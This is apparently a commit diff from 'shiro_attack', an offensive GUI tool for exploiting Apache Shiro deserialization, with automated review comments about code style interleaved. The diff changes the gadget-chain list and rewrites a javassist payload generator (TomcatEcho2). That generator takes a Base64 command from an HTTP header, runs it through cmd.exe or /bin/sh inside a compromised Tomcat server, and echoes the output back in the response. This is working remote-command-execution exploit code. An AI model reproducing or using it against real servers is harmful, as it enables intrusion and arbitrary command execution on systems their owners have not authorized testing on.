
Commit c86d8ed

committed
4.5.3 不再采用加载lib的方式去处理不同cb版本的问题,而是采用suuid字段修改的方式。
1 parent 9c0c5c6 commit c86d8ed


47 files changed

+372
-1661
lines changed

data/shiro_keys.txt

-1,208
This file was deleted.

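--- a/pom.xml
+++ b/pom.xml
@@ -6,7 +6,7 @@
 
 <groupId>org.example</groupId>
 <artifactId>shiro_attack</artifactId>
-<version>4.5.2-SNAPSHOT</version>
+<version>4.5.3-SNAPSHOT</version>
 <build>
 <plugins>
 <plugin>
@@ -110,11 +110,11 @@
 <version>3.12.0</version>
 </dependency>
 
-<!-- <dependency>-->
-<!-- <groupId>commons-beanutils</groupId>-->
-<!-- <artifactId>commons-beanutils</artifactId>-->
-<!-- <version>1.9.2</version>-->
-<!-- </dependency>-->
+<dependency>
+<groupId>commons-beanutils</groupId>
+<artifactId>commons-beanutils</artifactId>
+<version>1.9.2</version>
+</dependency>
 
 <dependency>
 <groupId>commons-collections</groupId>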

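--- a/src/main/java/com/summersec/attack/Encrypt/CbcEncrypt.java
+++ b/src/main/java/com/summersec/attack/Encrypt/CbcEncrypt.java
@@ -3,6 +3,7 @@
 import org.apache.shiro.codec.Base64;
 import org.apache.shiro.crypto.AesCipherService;
 import org.apache.shiro.util.ByteSource;
+import org.apache.shiro.util.SimpleByteSource;
 
 import java.io.ByteArrayOutputStream;
 import java.io.IOException;
@@ -30,8 +31,8 @@ public String encrypt(String key, byte[] objectBytes) {
 
 byte[] keyDecode = Base64.decode(key);
 AesCipherService cipherService = new AesCipherService();
-ByteSource byteSource = cipherService.encrypt(objectBytes, keyDecode);
-byte[] value = byteSource.getBytes();
-return new String(Base64.encode(value));
+SimpleByteSource byteSource = (SimpleByteSource) cipherService.encrypt(objectBytes, keyDecode);
+return byteSource.toBase64();
+
 }
 }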
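Review bot: The downcast to `SimpleByteSource` at new line 34 is unnecessary and fragile: the `ByteSource` interface already declares `toBase64()`, so the value returned by `cipherService.encrypt(...)` can be used through the interface, and the new `SimpleByteSource` import becomes unneeded. `return cipherService.encrypt(objectBytes, keyDecode).toBase64();` keeps the intent while removing a cast that would throw `ClassCastException` if the cipher service ever returned a different `ByteSource` implementation. The stray empty line added at new line 36 before the closing brace can go as well. The body of `encrypt` starts outside the hunk.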

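--- a/src/main/java/com/summersec/attack/Encrypt/GcmEncrypt.java
+++ b/src/main/java/com/summersec/attack/Encrypt/GcmEncrypt.java
@@ -1,5 +1,7 @@
 package com.summersec.attack.Encrypt;
 
+import cn.hutool.crypto.SecureUtil;
+import cn.hutool.crypto.symmetric.AES;
 import org.apache.shiro.codec.Base64;
 
 import javax.crypto.Cipher;
@@ -10,6 +12,7 @@
 import java.io.ObjectOutputStream;
 import java.security.NoSuchAlgorithmException;
 import java.security.SecureRandom;
+import java.util.Arrays;
 
 public class GcmEncrypt implements EncryptInterface {
 @Override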
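Review bot: The imports added at new lines 3, 4 and 15 (`cn.hutool.crypto.SecureUtil`, `cn.hutool.crypto.symmetric.AES`, `java.util.Arrays`) have no visible use in this section, which only shows the import block and the class header. If the rest of `GcmEncrypt` does not reference them, they should be dropped so the file does not accumulate unused imports; if they are used, it would help reviewers for the using code to be part of the same commit. The class body lies entirely outside the hunk.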

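--- a/src/main/java/com/summersec/attack/UI/Main.java
+++ b/src/main/java/com/summersec/attack/UI/Main.java
@@ -15,7 +15,7 @@ public Main() {
 @Override
 public void start(Stage primaryStage) throws Exception {
 Parent root = FXMLLoader.load(getClass().getResource("/gui.fxml"));
-primaryStage.setTitle("shiro反序列化漏洞综合利用工具 增强版 SummerSec & by3");
+primaryStage.setTitle("shiro反序列化漏洞综合利用工具 增强版 SummerSec");
 Scene scene = new Scene(root);
 primaryStage.setScene(scene);
 primaryStage.show();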

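--- a/src/main/java/com/summersec/attack/UI/MainController.java
+++ b/src/main/java/com/summersec/attack/UI/MainController.java
@@ -229,15 +229,14 @@ public void initComBoBox() {
 this.methodOpt.setPromptText("GET");
 this.methodOpt.setValue("GET");
 this.methodOpt.setItems(methods);
-ObservableList<String> gadgets = FXCollections.observableArrayList(new String[]{ "CommonsBeanutils1","CommonsBeanutils1_192", "CommonsCollections2", "CommonsCollections3", "CommonsCollectionsK1", "CommonsCollectionsK2", "CommonsBeanutilsString", "CommonsBeanutilsString_192", "CommonsBeanutilsAttrCompare", "CommonsBeanutilsAttrCompare_192", "CommonsBeanutilsPropertySource","CommonsBeanutilsPropertySource_192", "CommonsBeanutilsObjectToStringComparator", "CommonsBeanutilsObjectToStringComparator_192"});
+ObservableList<String> gadgets = FXCollections.observableArrayList(new String[]{ "CommonsBeanutils1","CommonsBeanutils1_183", "CommonsCollections2", "CommonsCollections3", "CommonsCollectionsK1", "CommonsCollectionsK2", "CommonsBeanutilsString", "CommonsBeanutilsString_183", "CommonsBeanutilsAttrCompare", "CommonsBeanutilsAttrCompare_183", "CommonsBeanutilsPropertySource","CommonsBeanutilsPropertySource_183", "CommonsBeanutilsObjectToStringComparator", "CommonsBeanutilsObjectToStringComparator_183"});
 // ObservableList<String> gadgets = FXCollections.observableArrayList(new String[]{ "CommonsBeanutils1" ,"CommonsBeanutils1_183" ,"CommonsCollections2", "CommonsCollections3", "CommonsCollectionsK1", "CommonsCollectionsK2", "CommonsBeanutilsString", "CommonsBeanutilsAttrCompare", "CommonsBeanutilsPropertySource", "CommonsBeanutilsObjectToStringComparator"});
 // ObservableList<String> gadgets = FXCollections.observableArrayList(new String[]{ "CommonsCollections2", "CommonsCollections3", "CommonsCollectionsK1", "CommonsCollectionsK2", "CommonsBeanutilsString", "CommonsBeanutilsAttrCompare", "CommonsBeanutilsPropertySource", "CommonsBeanutilsObjectToStringComparator"});
 this.gadgetOpt.setPromptText("CommonsBeanutilsString");
 this.gadgetOpt.setValue("CommonsBeanutilsString");
 this.gadgetOpt.setItems(gadgets);
 ObservableList<String> echoes = FXCollections.observableArrayList(new String[]{"AllEcho","TomcatEcho", "SpringEcho"});
-// ObservableList<String> echoes = FXCollections.observableArrayList(new String[]{"TomcatEcho", "SpringEcho"});
-// ObservableList<String> echoes = FXCollections.observableArrayList(new String[]{"TomcatEcho", "SpringEcho", "NoEcho", "ReverseEcho"});
+// ObservableList<String> echoes = FXCollections.observableArrayList(new String[]{"AllEcho","TomcatEcho", "TomcatEcho2", "SpringEcho"});
 this.echoOpt.setPromptText("TomcatEcho");
 this.echoOpt.setValue("TomcatEcho");
 this.echoOpt.setItems(echoes);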
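Review bot: New line 232 renames every `_192` entry to `_183` without saying anywhere in the code what the suffix selects, and the rewritten comment at new line 239 plus the surviving ones at 233 and 234 are commented-out alternatives of the same two lists. A one-line comment above the array stating what the `_183` suffix denotes (the commit message suggests it is tied to a library-version handling change, but the code does not say so) would make the rename understandable to the next reader, and the commented-out lists should be deleted rather than kept as dead code in the method. `initComBoBox` starts outside the hunk.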

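--- a/src/main/java/com/summersec/attack/core/AttackService.java
+++ b/src/main/java/com/summersec/attack/core/AttackService.java
@@ -202,7 +202,7 @@ public String GadgetPayload(String gadgetOpt, String echoOpt, String spcShiroKey
 Object chainObject = gadgetPayload.getObject(template);
 rememberMe = shiro.sendpayload(chainObject, this.shiroKeyWord, spcShiroKey);
 } catch (Exception var9) {
-// var9.printStackTrace();
+var9.printStackTrace();
 this.mainController.logTextArea.appendText(Utils.log(var9.getMessage()));
 }
 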
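Review bot: Re-enabling `var9.printStackTrace()` at new line 205 sends the trace to stderr while the next line reports only `var9.getMessage()` to the UI, so the two outputs disagree and the text area shows the literal `null` whenever the caught exception carries no message, which is realistic for a `catch (Exception ...)`. Prefer one reporting path: drop the `printStackTrace()` and log `String.valueOf(var9)` (exception class plus message) to the text area, `this.mainController.logTextArea.appendText(Utils.log(String.valueOf(var9)));`, or route the full trace through a logger if the project has one. `GadgetPayload` starts and ends outside the hunk.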
@@ -1,128 +1,19 @@
11
package com.summersec.attack.deser.echo;
22

33
import javassist.*;
4+
import java.io.*;
45

5-
import java.io.IOException;
66

7-
/**
8-
* @ClassName: TomcatEcho2
9-
* @Description: TODO
10-
* @Author: Summer
11-
* @Date: 2022/1/19 11:33
12-
* @Version: v1.0.0
13-
* @Description:
14-
**/
15-
public class TomcatEcho2 implements EchoPayload{
7+
public class TomcatEcho2 implements EchoPayload {
168
@Override
179
public CtClass genPayload(final ClassPool pool) throws CannotCompileException, NotFoundException, IOException {
1810
final CtClass clazz = pool.makeClass("com.summersec.x.Test" + System.nanoTime());
1911
if (clazz.getDeclaredConstructors().length != 0) {
2012
clazz.removeConstructor(clazz.getDeclaredConstructors()[0]);
2113
}
22-
23-
24-
25-
clazz.addMethod(CtMethod.make(" private static void writeBody(Object var0, byte[] var1) throws Exception {\n" +
26-
" byte[] bs = (\"$$$\" + org.apache.shiro.codec.Base64.encodeToString(var1) + \"$$$\").getBytes();\n" +
27-
" Object var2;\n" +
28-
" Class var3;\n" +
29-
" try {\n" +
30-
" var3 = Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\");\n" +
31-
" var2 = var3.newInstance();\n" +
32-
" var3.getDeclaredMethod(\"setBytes\", new Class[]{byte[].class, int.class, int.class}).invoke(var2, new Object[]{bs, new Integer(0), new Integer(bs.length)});\n" +
33-
" var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" +
34-
" } catch (Exception var5) {\n" +
35-
" var3 = Class.forName(\"java.nio.ByteBuffer\");\n" +
36-
" var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n" +
37-
" var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" +
38-
" } \n" +
39-
" }",clazz));
40-
41-
clazz.addMethod(CtMethod.make(" private static Object getFV(Object var0, String var1) throws Exception {\n" +
42-
" java.lang.reflect.Field var2 = null;\n" +
43-
" Class var3 = var0.getClass();\n" +
44-
"\n" +
45-
" while(var3 != Object.class) {\n" +
46-
" try {\n" +
47-
" var2 = var3.getDeclaredField(var1);\n" +
48-
" break;\n" +
49-
" } catch (NoSuchFieldException var5) {\n" +
50-
" var3 = var3.getSuperclass();\n" +
51-
" }\n" +
52-
" }\n" +
53-
"\n" +
54-
" if (var2 == null) {\n" +
55-
" throw new NoSuchFieldException(var1);\n" +
56-
" } else {\n" +
57-
" var2.setAccessible(true);\n" +
58-
" return var2.get(var0);\n" +
59-
" }\n" +
60-
" }", clazz));
61-
clazz.addConstructor(CtNewConstructor.make("public TomcatEcho() throws Exception {\n" +
62-
" boolean var4 = false;\n" +
63-
" Thread[] var5 = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n" +
64-
" for (int var6 = 0; var6 < var5.length; ++var6) {\n" +
65-
" Thread var7 = var5[var6];\n" +
66-
" if (var7 != null) {\n" +
67-
" String var3 = var7.getName();\n" +
68-
" if (!var3.contains(\"exec\") && var3.contains(\"http\")) {\n" +
69-
" Object var1 = getFV(var7, \"target\");\n" +
70-
" if (var1 instanceof Runnable) {\n" +
71-
" try {\n" +
72-
" var1 = getFV(getFV(getFV(var1, \"this$0\"), \"handler\"), \"global\");\n" +
73-
" } catch (Exception var13) {\n" +
74-
" continue;\n" +
75-
" }\n" +
76-
" java.util.List var9 = (java.util.List) getFV(var1, \"processors\");\n" +
77-
"\n" +
78-
" for(int var10 = 0; var10 < var9.size(); ++var10) {\n" +
79-
" Object var11 = var9.get(var10);\n" +
80-
" var1 = getFV(var11, \"req\");\n" +
81-
" Object var2 = var1.getClass().getMethod(\"getResponse\",new Class[0]).invoke(var1, new Object[0]);\n" +
82-
" try {\n" +
83-
"\n" +
84-
"\n" +
85-
" var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Host\")});\n" +
86-
" if (var3 != null && !var3.isEmpty()) {\n" +
87-
" var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n" +
88-
" var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Host\"), var3});\n" +
89-
" var4 = true;\n" +
90-
" }\n" +
91-
"\n" +
92-
" var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Authorization\")});\n" +
93-
" if (var3 != null && !var3.isEmpty()) {\n" +
94-
" var3 = org.apache.shiro.codec.Base64.decodeToString(var3.replaceAll(\"Basic \", \"\"));\n" +
95-
" String[] var12 = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", var3} : new String[]{\"/bin/sh\", \"-c\", var3};\n" +
96-
" writeBody(var2, (new java.util.Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter(\"\\\\A\").next().getBytes());\n" +
97-
" var4 = true;\n" +
98-
" }\n" +
99-
"\n" +
100-
" if (var4) {\n" +
101-
" break;\n" +
102-
" }\n" +
103-
" }catch (Exception var14) {\n" +
104-
" writeBody(var2, var14.getMessage().getBytes());\n" +
105-
" }\n" +
106-
" }\n" +
107-
"\n" +
108-
" if (var4) {\n" +
109-
" break;\n" +
110-
" }\n" +
111-
" }\n" +
112-
" }\n" +
113-
" }\n" +
114-
" }\n" +
115-
" }",clazz));
116-
14+
clazz.addMethod(CtMethod.make(" private static void writeBody(Object var0, byte[] var1) throws Exception {\n byte[] bs = (\"$$$\" + org.apache.shiro.codec.Base64.encodeToString(var1) + \"$$$\").getBytes();\n Object var2;\n Class var3;\n try {\n var3 = Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\");\n var2 = var3.newInstance();\n var3.getDeclaredMethod(\"setBytes\", new Class[]{byte[].class, int.class, int.class}).invoke(var2, new Object[]{bs, new Integer(0), new Integer(bs.length)});\n var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n } catch (ClassNotFoundException var5) {\n var3 = Class.forName(\"java.nio.ByteBuffer\");\n var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n } catch (NoSuchMethodException var6) {\n var3 = Class.forName(\"java.nio.ByteBuffer\");\n var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n }\n\n}", clazz));
15+
clazz.addMethod(CtMethod.make(" private static Object getFV(Object var0, String var1) throws Exception {\n java.lang.reflect.Field var2 = null;\n Class var3 = var0.getClass();\n\n while(var3 != Object.class) {\n try {\n var2 = var3.getDeclaredField(var1);\n break;\n } catch (NoSuchFieldException var5) {\n var3 = var3.getSuperclass();\n }\n }\n\n if (var2 == null) {\n throw new NoSuchFieldException(var1);\n } else {\n var2.setAccessible(true);\n return var2.get(var0);\n }\n }", clazz));
16+
clazz.addConstructor(CtNewConstructor.make(" public TomcatEcho() throws Exception {\n boolean var4 = false;\n Thread[] var5 = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n\n for (int var6 = 0; var6 < var5.length; ++var6) {\n Thread var7 = var5[var6];\n if (var7 != null) {\n String var3 = var7.getName();\n if (!var3.contains(\"exec\") && var3.contains(\"http\")) {\n Object var1 = getFV(var7, \"target\");\n if (var1 instanceof Runnable) {\n try {\n var1 = getFV(getFV(getFV(var1, \"this$0\"), \"handler\"), \"global\");\n } catch (Exception var13) {\n continue;\n }\n\n java.util.List var9 = (java.util.List) getFV(var1, \"processors\");\n\n for(int var10 = 0; var10 < var9.size(); ++var10) {\n Object var11 = var9.get(var10);\n var1 = getFV(var11, \"req\");\n Object var2 = var1.getClass().getMethod(\"getResponse\",new Class[0]).invoke(var1, new Object[0]);\n var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Ctmd\")});\n if (var3 != null && !var3.isEmpty()) {\n var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"techo\"), var3});\n var4 = true;\n }\n\n var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"c\")});\n if (var3 != null && !var3.isEmpty()) {\n var3 = org.apache.shiro.codec.Base64.decodeToString(var3);\n var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n String[] var12 = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? 
new String[]{\"cmd.exe\", \"/c\", var3} : new String[]{\"/bin/sh\", \"-c\", var3};\n writeBody(var2, (new java.util.Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter(\"\\\\A\").next().getBytes());\n var4 = true;\n }\n\n if (var4) {\n break;\n }\n }\n\n if (var4) {\n break;\n }\n }\n }\n }\n }\n}", clazz));
11717
return clazz;
11818
}
119-
120-
121-
public static void main(String[] args) throws NotFoundException, CannotCompileException, IOException {
122-
ClassPool pool = ClassPool.getDefault();
123-
// TomcatEcho2 tomcatEcho2 = new TomcatEcho2();
124-
SpringEcho springEcho = new SpringEcho();
125-
springEcho.genPayload(pool);
126-
// tomcatEcho2.genPayload(pool);
127-
}
128-
}
19+
}
